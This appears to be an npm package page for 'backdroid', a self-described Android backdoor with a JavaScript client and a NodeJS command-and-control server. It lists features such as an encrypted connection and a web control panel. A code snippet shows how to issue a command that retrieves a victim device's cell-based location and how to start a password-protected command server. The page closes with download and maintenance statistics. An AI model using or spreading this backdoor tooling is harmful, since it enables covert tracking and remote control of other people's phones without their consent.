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it's a backdoor for Android formed by a client written in JavaScript, with the help of http://onx.ms/, and a server written in NodeJS.
it's a backdoor for Android formed by a client written in JavaScript, with the help of http://onx.ms/, and a server written in NodeJS.
Encrypted connection in AES-256
Web panel control
Very flexible and scalable to add new features
var backdroid = require('backdroid');
backdroid.setCommand('location', { provider: 'CELL' }, function(command, value) {
console.log('[sent]', command, value);
}, function(command, value, response) {
console.log('[response]', command, value, response);
});
backdroid.createCommandServer({
password: 'secret',
password_encryptation: 'secret123',
port: 8888
});
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it's a backdoor for Android formed by a client written in JavaScript, with the help of http://onx.ms/, and a server written in NodeJS.
The npm package backdroid receives a total of 0 weekly downloads. As such, backdroid popularity was classified as not popular.
We found that backdroid demonstrated a not healthy version release cadence and project activity because the last version was released a year ago. It has 1 open source maintainer collaborating on the project.
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